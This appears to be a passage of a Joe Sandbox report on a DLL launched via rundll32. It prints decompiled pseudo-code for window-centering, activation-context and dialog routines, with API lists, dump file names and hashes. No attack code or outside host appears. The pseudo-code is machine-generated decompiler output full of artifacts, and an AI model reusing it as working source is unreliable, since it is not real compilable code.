                                                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,74ED5D80,1000D80F,?,?,?,?,?,?,?,1000F61E,00000000,00000002,00000028), ref: 1000D6EC
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1000D708
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1000D719
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000D72A
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000D73B
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000D74C
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000D75D
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 1000D76E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                                                            • API String ID: 667068680-68207542
                                                                                                                                                                            • Opcode ID: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
                                                                                                                                                                            • Instruction ID: 93615fb53cb164fe7f3d347b700eade87a81924dee4312457033af375ccc55a3
                                                                                                                                                                            • Opcode Fuzzy Hash: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
                                                                                                                                                                            • Instruction Fuzzy Hash: 7921E3B19097699BE701EF369DC856DBAF5F34F281391453FE109D2528EB3884C6EE20
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                            			E1000F530(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				struct tagRECT _v28;
                                                                                                                                                                            				struct tagRECT _v44;
                                                                                                                                                                            				struct tagRECT _v60;
                                                                                                                                                                            				struct tagRECT _v80;
                                                                                                                                                                            				char _v100;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                            				struct HWND__* _t59;
                                                                                                                                                                            				intOrPtr _t94;
                                                                                                                                                                            				signed int _t103;
                                                                                                                                                                            				struct HWND__* _t104;
                                                                                                                                                                            				void* _t105;
                                                                                                                                                                            				struct HWND__* _t107;
                                                                                                                                                                            				long _t108;
                                                                                                                                                                            				long _t116;
                                                                                                                                                                            				void* _t119;
                                                                                                                                                                            				struct HWND__* _t121;
                                                                                                                                                                            				void* _t123;
                                                                                                                                                                            				intOrPtr _t125;
                                                                                                                                                                            				intOrPtr _t129;
                                                                                                                                                                            
                                                                                                                                                                            				_t119 = __edx;
                                                                                                                                                                            				_t105 = __ebx;
                                                                                                                                                                            				_t125 = __ecx;
                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                            				_v8 = E10012862(__ecx);
                                                                                                                                                                            				_t58 = _a4;
                                                                                                                                                                            				if(_t58 == 0) {
                                                                                                                                                                            					if((_v8 & 0x40000000) == 0) {
                                                                                                                                                                            						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t59 = GetParent( *(__ecx + 0x20));
                                                                                                                                                                            					}
                                                                                                                                                                            					_t121 = _t59;
                                                                                                                                                                            					if(_t121 != 0) {
                                                                                                                                                                            						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                                                                                                                                            						if(_t104 != 0) {
                                                                                                                                                                            							_t121 = _t104;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t4 = _t58 + 0x20; // 0xc033d88b
                                                                                                                                                                            					_t121 =  *_t4;
                                                                                                                                                                            				}
                                                                                                                                                                            				_push(_t105);
                                                                                                                                                                            				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                                                                                                                                            				if((_v8 & 0x40000000) != 0) {
                                                                                                                                                                            					_t107 = GetParent( *(_t125 + 0x20));
                                                                                                                                                                            					GetClientRect(_t107,  &_v28);
                                                                                                                                                                            					GetClientRect(_t121,  &_v44);
                                                                                                                                                                            					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					if(_t121 != 0) {
                                                                                                                                                                            						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                                                                                                                                            						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                                                                                                                                            							_t121 = 0;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_v100 = 0x28;
                                                                                                                                                                            					if(_t121 != 0) {
                                                                                                                                                                            						GetWindowRect(_t121,  &_v44);
                                                                                                                                                                            						E1000D86F(_t121, E1000D804(_t121, 2),  &_v100);
                                                                                                                                                                            						CopyRect( &_v28,  &_v80);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t94 = E1000A7CE();
                                                                                                                                                                            						if(_t94 != 0) {
                                                                                                                                                                            							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                                                                                                                                            						}
                                                                                                                                                                            						E1000D86F(_t121, E1000D804(_t94, 1),  &_v100);
                                                                                                                                                                            						CopyRect( &_v44,  &_v80);
                                                                                                                                                                            						CopyRect( &_v28,  &_v80);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				_t108 = _v60.left;
                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                            				_t123 = _v60.right - _t108;
                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                            				_t120 = _v44.bottom;
                                                                                                                                                                            				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                                                                                                                                            				_a4 = _v60.bottom - _v60.top;
                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                            				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                                                                                                                                            				if(_t116 >= _v28.left) {
                                                                                                                                                                            					if(_t123 + _t116 > _v28.right) {
                                                                                                                                                                            						_t116 = _t108 - _v60.right + _v28.right;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t116 = _v28.left;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t129 >= _v28.top) {
                                                                                                                                                                            					if(_a4 + _t129 > _v28.bottom) {
                                                                                                                                                                            						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t129 = _v28.top;
                                                                                                                                                                            				}
                                                                                                                                                                            				return E1001297A(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                                                                                                                                            			}

























                                                                                                                                                                            0x1000f530
                                                                                                                                                                            0x1000f530
                                                                                                                                                                            0x1000f537
                                                                                                                                                                            0x1000f53a
                                                                                                                                                                            0x1000f542
                                                                                                                                                                            0x1000f545
                                                                                                                                                                            0x1000f54a
                                                                                                                                                                            0x1000f558
                                                                                                                                                                            0x1000f56a
                                                                                                                                                                            0x1000f55a
                                                                                                                                                                            0x1000f55d
                                                                                                                                                                            0x1000f55d
                                                                                                                                                                            0x1000f570
                                                                                                                                                                            0x1000f574
                                                                                                                                                                            0x1000f580
                                                                                                                                                                            0x1000f588
                                                                                                                                                                            0x1000f58a
                                                                                                                                                                            0x1000f58a
                                                                                                                                                                            0x1000f588
                                                                                                                                                                            0x1000f54c
                                                                                                                                                                            0x1000f54c
                                                                                                                                                                            0x1000f54c
                                                                                                                                                                            0x1000f54c
                                                                                                                                                                            0x1000f58c
                                                                                                                                                                            0x1000f59a
                                                                                                                                                                            0x1000f5a3
                                                                                                                                                                            0x1000f643
                                                                                                                                                                            0x1000f64a
                                                                                                                                                                            0x1000f651
                                                                                                                                                                            0x1000f65b
                                                                                                                                                                            0x1000f5a9
                                                                                                                                                                            0x1000f5ab
                                                                                                                                                                            0x1000f5b0
                                                                                                                                                                            0x1000f5bb
                                                                                                                                                                            0x1000f5c4
                                                                                                                                                                            0x1000f5c4
                                                                                                                                                                            0x1000f5bb
                                                                                                                                                                            0x1000f5c8
                                                                                                                                                                            0x1000f5cf
                                                                                                                                                                            0x1000f610
                                                                                                                                                                            0x1000f61f
                                                                                                                                                                            0x1000f62c
                                                                                                                                                                            0x1000f5d1
                                                                                                                                                                            0x1000f5d1
                                                                                                                                                                            0x1000f5d8
                                                                                                                                                                            0x1000f5da
                                                                                                                                                                            0x1000f5da
                                                                                                                                                                            0x1000f5ea
                                                                                                                                                                            0x1000f5fd
                                                                                                                                                                            0x1000f607
                                                                                                                                                                            0x1000f607
                                                                                                                                                                            0x1000f5cf
                                                                                                                                                                            0x1000f66a
                                                                                                                                                                            0x1000f66f
                                                                                                                                                                            0x1000f674
                                                                                                                                                                            0x1000f678
                                                                                                                                                                            0x1000f67b
                                                                                                                                                                            0x1000f682
                                                                                                                                                                            0x1000f68a
                                                                                                                                                                            0x1000f692
                                                                                                                                                                            0x1000f69a
                                                                                                                                                                            0x1000f6a1
                                                                                                                                                                            0x1000f6a6
                                                                                                                                                                            0x1000f6b2
                                                                                                                                                                            0x1000f6ba
                                                                                                                                                                            0x1000f6ba
                                                                                                                                                                            0x1000f6a8
                                                                                                                                                                            0x1000f6a8
                                                                                                                                                                            0x1000f6a8
                                                                                                                                                                            0x1000f6c0
                                                                                                                                                                            0x1000f6cf
                                                                                                                                                                            0x1000f6d7
                                                                                                                                                                            0x1000f6d7
                                                                                                                                                                            0x1000f6c2
                                                                                                                                                                            0x1000f6c2
                                                                                                                                                                            0x1000f6c2
                                                                                                                                                                            0x1000f6ef

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D
                                                                                                                                                                            • GetParent.USER32(?), ref: 1000F55D
                                                                                                                                                                            • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 1000F580
                                                                                                                                                                            • GetWindowRect.USER32 ref: 1000F59A
                                                                                                                                                                            • GetWindowLongA.USER32 ref: 1000F5B0
                                                                                                                                                                            • CopyRect.USER32 ref: 1000F5FD
                                                                                                                                                                            • CopyRect.USER32 ref: 1000F607
                                                                                                                                                                            • GetWindowRect.USER32 ref: 1000F610
                                                                                                                                                                            • CopyRect.USER32 ref: 1000F62C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 808654186-3887548279
                                                                                                                                                                            • Opcode ID: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
                                                                                                                                                                            • Instruction ID: 3f3129d87232bc90929dbfd76231b55f7e5f3d8dd267dcccc126c4261812b80e
                                                                                                                                                                            • Opcode Fuzzy Hash: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
                                                                                                                                                                            • Instruction Fuzzy Hash: 84517072900619AFEB00DFA8CC85EEEBBB9EF48290F154119FA05F3594DB30ED419B60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1000A1F9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				_Unknown_base(*)()* _t9;
                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                            				void* _t16;
                                                                                                                                                                            				intOrPtr* _t18;
                                                                                                                                                                            				char _t19;
                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                            				_Unknown_base(*)()* _t22;
                                                                                                                                                                            				_Unknown_base(*)()* _t23;
                                                                                                                                                                            
                                                                                                                                                                            				_t16 = __esi;
                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                            				_t18 = __ecx;
                                                                                                                                                                            				 *__ecx = _a4;
                                                                                                                                                                            				_a4 = 0;
                                                                                                                                                                            				_t19 =  *0x10058f2c; // 0x0
                                                                                                                                                                            				if(_t19 == 0) {
                                                                                                                                                                            					_t15 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                            					_t20 = _t15;
                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                            						L2:
                                                                                                                                                                            						E1000A0DB(0, _t12, _t15, _t16, _t20);
                                                                                                                                                                            					}
                                                                                                                                                                            					 *0x10058f1c = GetProcAddress(_t15, "CreateActCtxA");
                                                                                                                                                                            					 *0x10058f20 = GetProcAddress(_t15, "ReleaseActCtx");
                                                                                                                                                                            					 *0x10058f24 = GetProcAddress(_t15, "ActivateActCtx");
                                                                                                                                                                            					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
                                                                                                                                                                            					_t21 =  *0x10058f1c; // 0x0
                                                                                                                                                                            					 *0x10058f28 = _t9;
                                                                                                                                                                            					_t16 = _t16;
                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                            						__eflags =  *0x10058f20; // 0x0
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							goto L2;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							__eflags =  *0x10058f24; // 0x0
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								goto L2;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eflags = _t9;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									goto L2;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t22 =  *0x10058f20; // 0x0
                                                                                                                                                                            						if(_t22 == 0) {
                                                                                                                                                                            							goto L2;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t23 =  *0x10058f24; // 0x0
                                                                                                                                                                            							if(_t23 == 0) {
                                                                                                                                                                            								goto L2;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t20 = _t9;
                                                                                                                                                                            								if(_t9 == 0) {
                                                                                                                                                                            									goto L2;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					 *0x10058f2c = 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t18;
                                                                                                                                                                            			}














                                                                                                                                                                            0x1000a1f9
                                                                                                                                                                            0x1000a1f9
                                                                                                                                                                            0x1000a1ff
                                                                                                                                                                            0x1000a203
                                                                                                                                                                            0x1000a206
                                                                                                                                                                            0x1000a209
                                                                                                                                                                            0x1000a210
                                                                                                                                                                            0x1000a221
                                                                                                                                                                            0x1000a223
                                                                                                                                                                            0x1000a225
                                                                                                                                                                            0x1000a227
                                                                                                                                                                            0x1000a227
                                                                                                                                                                            0x1000a227
                                                                                                                                                                            0x1000a241
                                                                                                                                                                            0x1000a24e
                                                                                                                                                                            0x1000a25b
                                                                                                                                                                            0x1000a260
                                                                                                                                                                            0x1000a262
                                                                                                                                                                            0x1000a268
                                                                                                                                                                            0x1000a26d
                                                                                                                                                                            0x1000a26e
                                                                                                                                                                            0x1000a286
                                                                                                                                                                            0x1000a28c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a28e
                                                                                                                                                                            0x1000a28e
                                                                                                                                                                            0x1000a294
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a296
                                                                                                                                                                            0x1000a296
                                                                                                                                                                            0x1000a298
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a298
                                                                                                                                                                            0x1000a294
                                                                                                                                                                            0x1000a270
                                                                                                                                                                            0x1000a270
                                                                                                                                                                            0x1000a276
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a278
                                                                                                                                                                            0x1000a278
                                                                                                                                                                            0x1000a27e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a280
                                                                                                                                                                            0x1000a280
                                                                                                                                                                            0x1000a282
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a284
                                                                                                                                                                            0x1000a282
                                                                                                                                                                            0x1000a27e
                                                                                                                                                                            0x1000a276
                                                                                                                                                                            0x1000a29a
                                                                                                                                                                            0x1000a29a
                                                                                                                                                                            0x1000a2a6

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1000ACB1,000000FF), ref: 1000A21B
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 1000A239
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1000A246
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 1000A253
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1000A260
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                            • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                                                                            • API String ID: 667068680-3617302793
                                                                                                                                                                            • Opcode ID: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
                                                                                                                                                                            • Instruction ID: c20c66116e7296d4a0afd5037f2dffc74684b1862cb446d2da729e570b87d5d5
                                                                                                                                                                            • Opcode Fuzzy Hash: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
                                                                                                                                                                            • Instruction Fuzzy Hash: 3611C076C04266EBFB10DFA9ACC45097BE5E74F2D8301423FEA05A2124D7720980CF15
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E1000CB74(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                            				void* _t58;
                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                            				signed int _t63;
                                                                                                                                                                            				signed short _t71;
                                                                                                                                                                            				signed int _t84;
                                                                                                                                                                            				void* _t94;
                                                                                                                                                                            				struct HINSTANCE__* _t96;
                                                                                                                                                                            				signed int _t97;
                                                                                                                                                                            				void* _t98;
                                                                                                                                                                            				signed int _t100;
                                                                                                                                                                            				void* _t101;
                                                                                                                                                                            				void* _t102;
                                                                                                                                                                            
                                                                                                                                                                            				_t102 = __eflags;
                                                                                                                                                                            				_t94 = __edx;
                                                                                                                                                                            				_push(0x24);
                                                                                                                                                                            				E10017BF4(E10028029, __ebx, __edi, __esi);
                                                                                                                                                                            				_t100 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
                                                                                                                                                                            				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
                                                                                                                                                                            				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
                                                                                                                                                                            				_t54 = E1000D5EC(__ebx, __edi, __ecx, _t102);
                                                                                                                                                                            				_t96 =  *(_t54 + 0xc);
                                                                                                                                                                            				_t84 = 0;
                                                                                                                                                                            				_t103 =  *(_t100 + 0x58);
                                                                                                                                                                            				if( *(_t100 + 0x58) != 0) {
                                                                                                                                                                            					_t96 =  *(E1000D5EC(0, _t96, _t100, _t103) + 0xc);
                                                                                                                                                                            					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
                                                                                                                                                                            					 *(_t101 - 0x18) = _t54;
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *(_t101 - 0x18) != _t84) {
                                                                                                                                                                            					_t54 = LockResource( *(_t101 - 0x18));
                                                                                                                                                                            					 *(_t101 - 0x1c) = _t54;
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *(_t101 - 0x1c) != _t84) {
                                                                                                                                                                            					_t86 = _t100;
                                                                                                                                                                            					 *(_t101 - 0x14) = E1000C6AC(_t84, _t100, __eflags);
                                                                                                                                                                            					E1000FC04(_t84, _t96, __eflags);
                                                                                                                                                                            					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
                                                                                                                                                                            					__eflags =  *(_t101 - 0x14) - _t84;
                                                                                                                                                                            					 *(_t101 - 0x2c) = _t84;
                                                                                                                                                                            					 *(_t101 - 0x24) = _t84;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							__eflags = IsWindowEnabled( *(_t101 - 0x14));
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								EnableWindow( *(_t101 - 0x14), 0);
                                                                                                                                                                            								 *(_t101 - 0x2c) = 1;
                                                                                                                                                                            								_t84 = E1000A7CE();
                                                                                                                                                                            								__eflags = _t84;
                                                                                                                                                                            								 *(_t101 - 0x24) = _t84;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_t86 = _t84;
                                                                                                                                                                            									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                            										_t86 = _t84;
                                                                                                                                                                            										__eflags = E100128F8(_t84);
                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                            											_t86 = _t84;
                                                                                                                                                                            											E10012913(_t84, 0);
                                                                                                                                                                            											 *(_t101 - 0x28) = 1;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
                                                                                                                                                                            					E100115DC(_t96, __eflags, _t100);
                                                                                                                                                                            					_t58 = E1000FB5C(_t84, _t86, _t101,  *(_t101 - 0x14));
                                                                                                                                                                            					_push(_t96);
                                                                                                                                                                            					_push(_t58);
                                                                                                                                                                            					_push( *(_t101 - 0x1c));
                                                                                                                                                                            					_t59 = E1000C984(_t84, _t100, _t94, _t96, _t100, __eflags);
                                                                                                                                                                            					_t97 = 0;
                                                                                                                                                                            					__eflags = _t59;
                                                                                                                                                                            					if(_t59 != 0) {
                                                                                                                                                                            						__eflags =  *(_t100 + 0x3c) & 0x00000010;
                                                                                                                                                                            						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
                                                                                                                                                                            							_t98 = 4;
                                                                                                                                                                            							_t71 = E10012862(_t100);
                                                                                                                                                                            							__eflags = _t71 & 0x00000100;
                                                                                                                                                                            							if((_t71 & 0x00000100) != 0) {
                                                                                                                                                                            								_t98 = 5;
                                                                                                                                                                            							}
                                                                                                                                                                            							E1000F6F2(_t100, _t98);
                                                                                                                                                                            							_t97 = 0;
                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
                                                                                                                                                                            						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
                                                                                                                                                                            							E1001297A(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                                                                                                                                            					__eflags =  *(_t101 - 0x28) - _t97;
                                                                                                                                                                            					if( *(_t101 - 0x28) != _t97) {
                                                                                                                                                                            						E10012913(_t84, 1);
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *(_t101 - 0x2c) - _t97;
                                                                                                                                                                            					if( *(_t101 - 0x2c) != _t97) {
                                                                                                                                                                            						EnableWindow( *(_t101 - 0x14), 1);
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *(_t101 - 0x14) - _t97;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							SetActiveWindow( *(_t101 - 0x14));
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					 *((intOrPtr*)( *_t100 + 0x60))();
                                                                                                                                                                            					E1000C6E6(_t84, _t100, _t97, _t100, __eflags);
                                                                                                                                                                            					__eflags =  *(_t100 + 0x58) - _t97;
                                                                                                                                                                            					if( *(_t100 + 0x58) != _t97) {
                                                                                                                                                                            						FreeResource( *(_t101 - 0x18));
                                                                                                                                                                            					}
                                                                                                                                                                            					_t63 =  *(_t100 + 0x44);
                                                                                                                                                                            					goto L31;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t63 = _t54 | 0xffffffff;
                                                                                                                                                                            					L31:
                                                                                                                                                                            					return E10017C60(_t63);
                                                                                                                                                                            				}
                                                                                                                                                                            			}
















                                                                                                                                                                            0x1000cb74
                                                                                                                                                                            0x1000cb74
                                                                                                                                                                            0x1000cb74
                                                                                                                                                                            0x1000cb7b
                                                                                                                                                                            0x1000cb80
                                                                                                                                                                            0x1000cb82
                                                                                                                                                                            0x1000cb88
                                                                                                                                                                            0x1000cb8e
                                                                                                                                                                            0x1000cb91
                                                                                                                                                                            0x1000cb96
                                                                                                                                                                            0x1000cb99
                                                                                                                                                                            0x1000cb9b
                                                                                                                                                                            0x1000cb9e
                                                                                                                                                                            0x1000cba5
                                                                                                                                                                            0x1000cbb6
                                                                                                                                                                            0x1000cbbc
                                                                                                                                                                            0x1000cbbc
                                                                                                                                                                            0x1000cbc2
                                                                                                                                                                            0x1000cbc7
                                                                                                                                                                            0x1000cbcd
                                                                                                                                                                            0x1000cbcd
                                                                                                                                                                            0x1000cbd3
                                                                                                                                                                            0x1000cbdd
                                                                                                                                                                            0x1000cbe4
                                                                                                                                                                            0x1000cbe7
                                                                                                                                                                            0x1000cbec
                                                                                                                                                                            0x1000cbef
                                                                                                                                                                            0x1000cbf2
                                                                                                                                                                            0x1000cbf5
                                                                                                                                                                            0x1000cbf8
                                                                                                                                                                            0x1000cc00
                                                                                                                                                                            0x1000cc03
                                                                                                                                                                            0x1000cc0e
                                                                                                                                                                            0x1000cc10
                                                                                                                                                                            0x1000cc17
                                                                                                                                                                            0x1000cc1d
                                                                                                                                                                            0x1000cc29
                                                                                                                                                                            0x1000cc2b
                                                                                                                                                                            0x1000cc2d
                                                                                                                                                                            0x1000cc30
                                                                                                                                                                            0x1000cc34
                                                                                                                                                                            0x1000cc3c
                                                                                                                                                                            0x1000cc3e
                                                                                                                                                                            0x1000cc40
